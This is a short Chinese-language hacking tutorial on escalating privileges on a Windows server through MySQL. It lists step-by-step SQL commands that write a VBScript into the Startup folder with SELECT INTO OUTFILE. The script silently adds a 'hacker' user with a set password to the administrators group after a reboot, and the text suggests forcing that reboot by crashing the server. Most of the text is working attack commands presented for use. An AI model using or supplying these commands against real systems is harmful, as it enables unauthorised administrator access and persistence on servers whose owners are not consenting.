开机启动项提权

• 开机启动项提权原理：利用mysql，将后门写入开机自启动项。同时因为是开机自启动，写入之后，需要重启目标服务器。(这个要求mysql的权限就很高，至少是管理员权限甚至是system，可以利用一些漏洞尝试打蓝屏重启)

• windows的开机启动地址：

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

1、利用UDF提权得到的shell

UDF提权的到的shell

2、创建表

create table dota(cmd text);

创建表

3、插入数据

insert into dota values("set wshshell=createobject(""wscript.shell"")"),("a=wshshell.run(""cmd.exe /c net user hacker admin@123 /add"",0)"),("b=wshshell.run(""cmd.exe /c net localgroup administrators hacker /add"",0)");

插入启动脚本数据

4、写入开机启动文件

select * from dota into outfile " C:\Users\Administrator.WIN702\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adduser.vbs";

写入开机启动文件

5、查看开机启动文件

查看开机启动文件

6、重启开机启动

开机启动

•开机启动，发现 hacker 账户已经增加成功